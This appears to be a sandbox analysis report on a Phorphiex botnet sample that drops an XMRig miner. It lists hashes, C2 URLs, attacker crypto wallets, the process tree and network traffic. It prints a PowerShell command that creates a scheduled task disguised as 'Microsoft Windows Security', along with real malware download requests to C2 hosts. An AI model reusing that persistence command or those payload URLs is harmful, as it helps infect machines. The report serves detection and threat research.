Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    05-12-2024 08:04

General

  • Target

    8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe

  • Size

    447KB

  • MD5

    d5d3129db24df5cccdb15ea1f5cbd119

  • SHA1

    67e1bd36976019766d2f4e8cc02be8935001c661

  • SHA256

    8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160

  • SHA512

    74dca8888ffc584e1e56b4644e71b0941f06825ff2542edbe4196fda3f540e8b5d8a39c047aed7707c80be975802133e88769efdfc65e99f363fe96d73b9dea5

  • SSDEEP

    6144:QLPnZC2bLwAMEDMrHDxn1pyvGp3wCat3SluW3DMSHMRdpwWDYql4qRFT5P5GD:Q7nZ1fgrjBryvlSlu4M/0WsqlbxU

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    753f85d83d

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

phorphiex

C2

http://twizt.net

http://185.215.113.84

Signatures

  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1188
      • C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
        "C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe"
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Users\Admin\AppData\Local\Temp\BD85.exe
          "C:\Users\Admin\AppData\Local\Temp\BD85.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1084
          • C:\Users\Admin\AppData\Local\Temp\3278622590.exe
            C:\Users\Admin\AppData\Local\Temp\3278622590.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2764
            • C:\Windows\sysnldcvmr.exe
              C:\Windows\sysnldcvmr.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2792
              • C:\Users\Admin\AppData\Local\Temp\2986423650.exe
                C:\Users\Admin\AppData\Local\Temp\2986423650.exe
                6⤵
                • Executes dropped EXE
                PID:2684
              • C:\Users\Admin\AppData\Local\Temp\2127311717.exe
                C:\Users\Admin\AppData\Local\Temp\2127311717.exe
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\Users\Admin\AppData\Local\Temp\3084034625.exe
                  C:\Users\Admin\AppData\Local\Temp\3084034625.exe
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2884
              • C:\Users\Admin\AppData\Local\Temp\1268232551.exe
                C:\Users\Admin\AppData\Local\Temp\1268232551.exe
                6⤵
                • Executes dropped EXE
                PID:3016
              • C:\Users\Admin\AppData\Local\Temp\2594321231.exe
                C:\Users\Admin\AppData\Local\Temp\2594321231.exe
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1184
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2592
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        2⤵
          PID:2512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1124
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:944
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:2092
          • C:\Windows\System32\dwm.exe
            C:\Windows\System32\dwm.exe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2984
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {A51A4541-467A-4165-9FF3-F69C21B443AD} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
            "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2568

        Network

        • flag-ru
          GET
          http://185.215.113.66/32.exe
          8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /32.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
          Host: 185.215.113.66
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:38 GMT
          Content-Type: application/octet-stream
          Content-Length: 10240
          Last-Modified: Thu, 28 Nov 2024 09:15:33 GMT
          Connection: keep-alive
          ETag: "674834b5-2800"
          Accept-Ranges: bytes
        • flag-us
          DNS
          twizt.net
          BD85.exe
          Remote address:
          8.8.8.8:53
          Request
          twizt.net
          IN A
          Response
          twizt.net
          IN A
          185.215.113.66
        • flag-ru
          GET
          http://twizt.net/newtpp.exe
          BD85.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /newtpp.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Host: twizt.net
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:41 GMT
          Content-Type: application/octet-stream
          Content-Length: 80896
          Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
          Connection: keep-alive
          ETag: "6733d71b-13c00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://twizt.net/peinstall.php
          BD85.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /peinstall.php HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
          Host: twizt.net
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:43 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          GET
          http://185.215.113.66/1
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 9472
          Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
          Connection: keep-alive
          ETag: "674f01b0-2500"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/1
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:51 GMT
          Content-Type: application/octet-stream
          Content-Length: 9472
          Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
          Connection: keep-alive
          ETag: "674f01b0-2500"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/2
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:56 GMT
          Content-Type: application/octet-stream
          Content-Length: 10496
          Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
          Connection: keep-alive
          ETag: "67154d18-2900"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/2
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:04:57 GMT
          Content-Type: application/octet-stream
          Content-Length: 10496
          Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
          Connection: keep-alive
          ETag: "67154d18-2900"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/3
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:02 GMT
          Content-Type: application/octet-stream
          Content-Length: 55040
          Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
          Connection: keep-alive
          ETag: "674b357a-d700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.84/nxmr.exe
          2127311717.exe
          Remote address:
          185.215.113.84:80
          Request
          GET /nxmr.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Host: 185.215.113.84
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:02 GMT
          Content-Type: application/octet-stream
          Content-Length: 5827584
          Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
          Connection: keep-alive
          ETag: "66f70fa2-58ec00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/3
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:04 GMT
          Content-Type: application/octet-stream
          Content-Length: 55040
          Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
          Connection: keep-alive
          ETag: "674b357a-d700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/4
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:09 GMT
          Content-Type: application/octet-stream
          Content-Length: 63232
          Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
          Connection: keep-alive
          ETag: "67497f08-f700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/4
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:10 GMT
          Content-Type: application/octet-stream
          Content-Length: 63232
          Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
          Connection: keep-alive
          ETag: "67497f08-f700"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.66/5
          sysnldcvmr.exe
          Remote address:
          185.215.113.66:80
          Request
          GET /5 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 185.215.113.66
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:16 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/IBSTSWSONL
          2594321231.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /IBSTSWSONL HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:15 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/1
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /1 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:19 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/2
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /2 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:21 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/3
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /3 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:23 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/4
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /4 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:25 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-tm
          GET
          http://91.202.233.141/5
          sysnldcvmr.exe
          Remote address:
          91.202.233.141:80
          Request
          GET /5 HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
          Host: 91.202.233.141
          Response
          HTTP/1.1 404 Not Found
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 05 Dec 2024 08:05:28 GMT
          Content-Type: text/html
          Content-Length: 564
          Connection: keep-alive
        • flag-us
          DNS
          twizthash.net
          dwm.exe
          Remote address:
          8.8.8.8:53
          Request
          twizthash.net
          IN A
          Response
          twizthash.net
          IN A
          185.215.113.66
        • flag-us
          DNS
          www.update.microsoft.com
          sysnldcvmr.exe
          Remote address:
          8.8.8.8:53
          Request
          www.update.microsoft.com
          IN A
          Response
          www.update.microsoft.com
          IN CNAME
          redir.update.msft.com.trafficmanager.net
          redir.update.msft.com.trafficmanager.net
          IN A
          20.109.209.108
        • 185.215.113.66:80
          http://185.215.113.66/32.exe
          http
          8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
          687 B
          10.9kB
          8
          10

          HTTP Request

          GET http://185.215.113.66/32.exe

          HTTP Response

          200
        • 185.215.113.66:80
          http://twizt.net/peinstall.php
          http
          BD85.exe
          2.2kB
          83.9kB
          41
          64

          HTTP Request

          GET http://twizt.net/newtpp.exe

          HTTP Response

          200

          HTTP Request

          GET http://twizt.net/peinstall.php

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/1
          http
          sysnldcvmr.exe
          622 B
          10.2kB
          10
          11

          HTTP Request

          GET http://185.215.113.66/1

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/2
          http
          sysnldcvmr.exe
          970 B
          21.3kB
          14
          19

          HTTP Request

          GET http://185.215.113.66/1

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/2

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/3
          http
          sysnldcvmr.exe
          1.9kB
          53.1kB
          35
          41

          HTTP Request

          GET http://185.215.113.66/2

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/3

          HTTP Response

          200
        • 185.215.113.84:80
          http://185.215.113.84/nxmr.exe
          http
          2127311717.exe
          127.5kB
          6.0MB
          2606
          4297

          HTTP Request

          GET http://185.215.113.84/nxmr.exe

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/4
          http
          sysnldcvmr.exe
          2.2kB
          79.4kB
          41
          60

          HTTP Request

          GET http://185.215.113.66/3

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/4

          HTTP Response

          200
        • 185.215.113.66:80
          http://185.215.113.66/5
          http
          sysnldcvmr.exe
          1.9kB
          66.3kB
          34
          52

          HTTP Request

          GET http://185.215.113.66/4

          HTTP Response

          200

          HTTP Request

          GET http://185.215.113.66/5

          HTTP Response

          404
        • 91.202.233.141:80
          http://91.202.233.141/IBSTSWSONL
          http
          2594321231.exe
          362 B
          860 B
          4
          3

          HTTP Request

          GET http://91.202.233.141/IBSTSWSONL

          HTTP Response

          404
        • 91.202.233.141:80
          http://91.202.233.141/5
          http
          sysnldcvmr.exe
          1.4kB
          4.0kB
          13
          8

          HTTP Request

          GET http://91.202.233.141/1

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/2

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/3

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/4

          HTTP Response

          404

          HTTP Request

          GET http://91.202.233.141/5

          HTTP Response

          404
        • 185.215.113.66:5152
          twizthash.net
          dwm.exe
          1.1kB
          3.7kB
          12
          11
        • 20.109.209.108:80
          www.update.microsoft.com
          sysnldcvmr.exe
          144 B
          92 B
          3
          2
        • 213.230.126.169:40500
          sysnldcvmr.exe
          152 B
          3
        • 46.100.82.131:40500
          sysnldcvmr.exe
          152 B
          3
        • 94.51.68.160:40500
          sysnldcvmr.exe
          152 B
          3
        • 8.8.8.8:53
          twizt.net
          dns
          BD85.exe
          55 B
          71 B
          1
          1

          DNS Request

          twizt.net

          DNS Response

          185.215.113.66

        • 8.8.8.8:53
          twizthash.net
          dns
          dwm.exe
          59 B
          75 B
          1
          1

          DNS Request

          twizthash.net

          DNS Response

          185.215.113.66

        • 8.8.8.8:53
          www.update.microsoft.com
          dns
          sysnldcvmr.exe
          70 B
          140 B
          1
          1

          DNS Request

          www.update.microsoft.com

          DNS Response

          20.109.209.108

        • 90.156.163.33:40500
          sysnldcvmr.exe
          64 B
          1
        • 77.81.130.60:40500
          sysnldcvmr.exe
          64 B
          1
        • 90.156.161.82:40500
          sysnldcvmr.exe
          64 B
          1
        • 46.100.164.239:40500
          sysnldcvmr.exe
          64 B
          1
        • 2.190.242.182:40500
          sysnldcvmr.exe
          64 B
          1
        • 217.30.162.37:40500
          sysnldcvmr.exe
          64 B
          1
        • 189.230.99.20:40500
          sysnldcvmr.exe
          64 B
          1
        • 195.158.15.3:40500
          sysnldcvmr.exe
          64 B
          1
        • 84.240.235.134:40500
          sysnldcvmr.exe
          64 B
          1
        • 95.212.120.220:40500
          sysnldcvmr.exe
          64 B
          1
        • 5.76.0.203:40500
          sysnldcvmr.exe
          64 B
          1
        • 151.241.114.78:40500
          sysnldcvmr.exe
          64 B
          1
        • 2.191.61.218:40500
          sysnldcvmr.exe
          64 B
          1

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\BD85.exe

          Filesize

          10KB

          MD5

          8ce09f13942ab5bcb81b175996c8385f

          SHA1

          6fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd

          SHA256

          757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d

          SHA512

          11ae4651b3dd55355b2cb7bf2f6b042dea47bb895f898d967d63ee652652c633cc5becf31cb2fd7f8797b238b264195d09d4e08211b797eae29e2a7bb31b277f

        • C:\Users\Admin\AppData\Local\Temp\Setup_20241205080437_Failed.txt

          Filesize

          745B

          MD5

          8173b6b8d13317cfd59904e50ed1a5ea

          SHA1

          eac71a4715c26c59f215f56cf28ed74b1210ceca

          SHA256

          bdda60acdd87a63edc1f37dc397549180547a9b5130e74ac4304dd95ed2717ae

          SHA512

          7745c8ddcf34125a011da5262c3b046848acfa18fe18d4df987746d201778f84b0b313042bdc2b362054fcd7db94719615fa0bdb1aab2308480a0e70f33174fc

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          ff293aed5505000cab8831784b853ae2

          SHA1

          53f50192a408a614142372b24a9a012c3681d25e

          SHA256

          23ad28d972d27aff848463f9ab8e88d5d32cce98398d5fed052f6018536f2db3

          SHA512

          c041aa5f737bd4da015372efea6af664c4a4d2bb931ca75255dbdab3d31d50f6d04ccfbc99107e15186316492ae7d3768bc35d6689019ab4286911d2b9a6ecf1

        • \Users\Admin\AppData\Local\Temp\1268232551.exe

          Filesize

          53KB

          MD5

          84897ca8c1aa06b33248956ac25ec20a

          SHA1

          544d5d5652069b3c5e7e29a1ca3eea46b227bbfe

          SHA256

          023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1

          SHA512

